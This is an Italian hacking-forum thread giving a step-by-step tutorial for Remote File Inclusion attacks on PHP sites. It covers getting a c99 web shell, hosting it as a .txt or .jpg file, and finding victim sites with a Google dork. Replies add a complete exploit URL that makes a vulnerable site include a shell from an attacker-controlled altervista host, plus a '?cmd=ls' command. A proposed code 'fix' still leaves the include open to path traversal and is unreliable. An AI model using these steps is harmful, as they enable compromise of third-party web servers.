• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Gianginside

Nuovo utente
Autore del topic
4 Ottobre 2007
1
0
Miglior risposta
0
Bene...Salve a tutti...!
E da tanto che non faccio un salto qui...e per farmi perdonare :emoji_smiley:(sono Il vecchio Gianluca)
Vi illustrero' una guida semplice semplice...:emoji_slight_smile: (Anche per lamer fannulloni;))scherzo..non lamerate!!
cmq vi illustero' su come eseguire un Remote File Include siccome vedo che parlate sempre di sta benedetta c99 e non sapete sfruttarla in modo corretto!!
Una persona piu inteliggente non caschera' mai nel trukko di un file.php estraneo in un proprio ftp.....almeno che non si abbia una grande dote nel social enginering (i piu esperti mi capiranno[8D])
ok iniziamo
procuriamoci una shell c99 al seguente indirizzo
Perfavore, Entra oppure Registrati per vedere i Link!

oppure una c2007 che hanno esposto sul forum...
e uppatela su un vostro ftp in formato .txt o .jpg
ATTENZIONE NON SALVATELA IN .PHP LA SHELL GIRERA' SOLO IN LOCALE E QUINDI NON SERVIRA A NULLA...
bene ora abbiamo tutto l'occorrente
per prima cosa usiamo quelle che voi amate chiamare "dork"
e che io chiamo semplicemente Query [:o)]
inurl: "index.php?pag="
e ne troverete tantissime all'indirizzo
Perfavore, Entra oppure Registrati per vedere i Link!

bene ora ricerchiamo con google la query (se usiamo il motore di altavista che ritengo anche migliore siccome google ti trova molti siti contenenti query per le rfi [8)])
ora andiamo sul sito vittima che abbiamo trovato
che sara cosi
Perfavore, Entra oppure Registrati per vedere i Link!

oppure
Perfavore, Entra oppure Registrati per vedere i Link!

bene ora carichiamo l'url e vedremo che si aprira la shell con le varie opzioni...
molte volte accade che il sito non e vulnerabile e questo non succede
ed e proprio questa la difficolta!
Prima di sparare si deve fiutare..:emoji_smiley:
se qualcosa non e chiaro postate!
 
A me non piace come guida... Spiega anche il bug che sta nel codice php e magari anche come fixarlo... E poi ci manca il comando
 
semplice la fix
visto k usano il prametro
$pag = //prendo la vars da dv vojo xD
include("$pag");

Basta fare...

$pag = // predno la vars
include("/pagine/$pag/index.php");

Tiè! xD
 
comando:

?cmd=ls

Exploit completo:

http:\\sitovulnerabile.it\index.php?page=http:\\tuosito.altervista.org\tuashell.txt
 
sisi ho capito ma dico è una vulnerabilità da dementi...
Intendo che bisonga essere stupidi x fare una vulnerabilità così (FIXABILE CON IL CODICE K HO SCRITTO SOPRA)
 
@Arkangelo: Mi spieghi sto comando: ?cmd=ls ?
@Negrosoo: Eppure ci sono molte CMS e Board vulnerabili
 
@Vincy: Bhe credo che ora non le faranno più così..
magari sono vulnerabili se c'è qualche connessione ad una statistica esterna boh!